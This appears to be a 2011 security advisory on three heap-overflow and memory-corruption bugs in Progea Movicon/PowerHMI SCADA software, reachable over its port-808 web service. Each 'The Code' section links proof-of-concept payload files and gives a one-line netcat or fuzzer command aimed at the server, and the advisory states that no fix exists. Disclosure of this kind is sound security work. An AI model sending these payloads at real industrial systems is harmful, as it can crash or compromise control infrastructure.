135 lines
No EOL
3 KiB
Text
135 lines
No EOL
3 KiB
Text
#######################################################################
|
|
|
|
Luigi Auriemma
|
|
|
|
Application: Progea Movicon / PowerHMI
|
|
http://www.progea.com
|
|
Versions: <= 11.2.1085
|
|
Platforms: Windows
|
|
Bug: memory corruption
|
|
Exploitation: remote
|
|
Date: 13 Sep 2011
|
|
Author: Luigi Auriemma
|
|
e-mail: aluigi@autistici.org
|
|
web: aluigi.org
|
|
|
|
|
|
#######################################################################
|
|
|
|
|
|
1) Introduction
|
|
2) Bug
|
|
3) The Code
|
|
4) Fix
|
|
|
|
|
|
#######################################################################
|
|
|
|
===============
|
|
1) Introduction
|
|
===============
|
|
|
|
|
|
Movicon is an italian SCADA/HMI software.
|
|
|
|
|
|
#######################################################################
|
|
|
|
======
|
|
2-1) Bug
|
|
======
|
|
|
|
|
|
When the software runs a project it listens on port 808 for accepting
|
|
some HTTP requests.
|
|
|
|
The server is affected by a heap overflow caused by the usage of a
|
|
negative Content-Length field which allows to corrupt the memory
|
|
through "memcpy(heap_buffer, input, content_length_size)".
|
|
|
|
|
|
#######################################################################
|
|
|
|
===========
|
|
3-1) The Code
|
|
===========
|
|
|
|
|
|
http://aluigi.org/poc/movicon_1.dat
|
|
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17842-1.dat
|
|
|
|
nc SERVER 808 < movicon_1.dat
|
|
|
|
|
|
#######################################################################
|
|
|
|
======
|
|
2-2) Bug
|
|
======
|
|
|
|
|
|
When the software runs a project it listens on port 808 for accepting
|
|
some HTTP requests.
|
|
|
|
The server is affected by a heap overflow caused by the usage of a
|
|
buffer of 8192 bytes for containing the incoming HTTP requests.
|
|
|
|
|
|
#######################################################################
|
|
|
|
===========
|
|
3-2) The Code
|
|
===========
|
|
|
|
|
|
http://aluigi.org/testz/udpsz.zip
|
|
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15707.zip
|
|
|
|
udpsz -T -b 0x61 SERVER 808 10000
|
|
|
|
|
|
#######################################################################
|
|
|
|
======
|
|
2-3) Bug
|
|
======
|
|
|
|
|
|
When the software runs a project it listens on port 808 for accepting
|
|
some HTTP requests and on port 12233 for a particular "EIDP" protocol.
|
|
|
|
Through a too big size field in the "EIDP" packets tunnelled via the
|
|
web service (doesn't seem possible to exploit the bug via the original
|
|
port) it's possible to write a 0x00 byte in an arbitrary memory zone
|
|
higher than 0x7fffffff:
|
|
|
|
00a29001 c6041100 mov byte ptr [ecx+edx],0 ds:0023:80616161=??
|
|
|
|
This limitation could make the bug interesting only in some 64bit
|
|
environments.
|
|
|
|
|
|
#######################################################################
|
|
|
|
===========
|
|
3-3) The Code
|
|
===========
|
|
|
|
|
|
http://aluigi.org/poc/movicon_3.dat
|
|
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17842-3.dat
|
|
|
|
nc SERVER 808 < movicon_3.dat
|
|
|
|
|
|
#######################################################################
|
|
|
|
======
|
|
4) Fix
|
|
======
|
|
|
|
|
|
No fix.
|
|
|
|
|
|
####################################################################### |